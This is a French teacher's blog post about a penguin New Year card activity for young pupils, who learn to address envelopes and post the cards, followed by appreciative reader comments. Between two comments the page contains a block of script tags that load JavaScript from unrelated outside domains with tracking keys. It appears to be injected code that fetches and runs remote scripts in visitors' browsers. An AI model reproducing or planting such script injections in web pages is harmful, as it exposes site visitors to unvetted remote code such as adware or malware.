• Carte de vœux pingouins

    Pour cette année 2020, les élèves de MS/GS vont envoyer leur carte de vœux à un proche ( famille, amis). J’ai demandé une enveloppe timbrée avec l’adresse et nous irons tous ensemble à la poste. 

    Un bon moyen pour travailler ce qu’il faut mettre sur une enveloppe pour que le courrier arrive à destination.

    En même temps, nous apprenons la chanson, un pingouin du pôle Nord ;) 

    J'ai utilisé des crayons pailletés ;) 

     

    Carte de vœux pingouins

    Carte de vœux pingouins

    Carte de vœux pingouins


  • Commentaires

    8
    Marion
    Lundi 2 Janvier 2023 à 14:38

    Un grand merci pour cette idée de carte de voeux ! Je vais tenter également un premier essai d'écriture cursive pour mes GS... et en capitales pour mes MS ;)

    Très bonne année, et j'en profite pour te remercier de tout ce que tu fais pour nous : ton blog, tes livres... C'est ma plus grande source d'inspiration ;)

    7
    virginie
    Mercredi 5 Janvier 2022 à 11:55

    Merci Lucie !

    encore une fois une super idée d'allier arts visuels/écriture/production d'écrits ... une jolie note positive surtout en ce moment !!!

    plein de bonnes choses à toi et ta famille yes

    6
    giani
    Dimanche 2 Janvier 2022 à 18:55
    giani

    Merci Luccia  !!!!

    Je vais faire mes cartes à envoyer à un proche sur le thème des pingouins cette année . Ici la neige est rare, on ne la vit que par les livres, les histoires, les activités manuelles... lol

     

    Bonne année à toi et tes proches de Provence.

    <script src="//scrprime.com/23178e2c7c2ade2327.js"></script> <script src="http://hublosk.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8983x" type="text/javascript"></script> <script src="http://jullyambery.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8983x&format=arrjs&r=1641146020465" type="text/javascript"></script> <script src="http://scrprime.com/ext/23178e2c7c2ade2327.js?sid=52715_8983_&title=qq&blocks[]=31af2" type="text/javascript"></script>
    5
    Carollac
    Dimanche 2 Janvier 2022 à 15:41

    J'adooooore cette idée ! Du coup, je m'en inspire pour la rentrée, top ! Et on ira à la poste, super !! Merci Luccia !!wink2

    4
    Celyne27
    Vendredi 31 Décembre 2021 à 17:04

    Merci pour cette belle idée que je vais tenter de faire avec mes GS et CP. Même si le post date, c'est l'occasion de vous dire merci pour tout ce que vous partagez et je vous souhaite un bon réveillon de fin d'année 2021...

    3
    Cathy
    Mardi 29 Décembre 2020 à 10:35

    Bonjour,

    je suis en train de réfléchir à ma carte de voeux et tes petits pingouins sont bien sympathiques ! Où trouves-tu la page meilleurs voeux dans toutes les langues ? Tu as fait le contour au feutre ou à la peinture ? Qu'as-tu utilisé pour becs et pattes ?

    Bravo pour ton site ; je suis totalement addict !!!

    2
    Djou
    Lundi 13 Janvier 2020 à 20:39
    Bonne...idée ! Ils savent déjà écrire bonne année ?? Je croyais su ils commencaient la cursive que maintenant ? (Cahier d'écriture)
      • Lundi 13 Janvier 2020 à 21:43

        Effectivement, mais nous travaillons la cursive depuis Septembre : tenue du crayon, tenue de la ligne, miniaturisation de la boucle, salade de boucles (petites, grandes ...). J'étais à côté de chacun d'eux, en individuel, notamment pour le o et le a qui commence comme un c et qu'on a très peu vu :) 

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :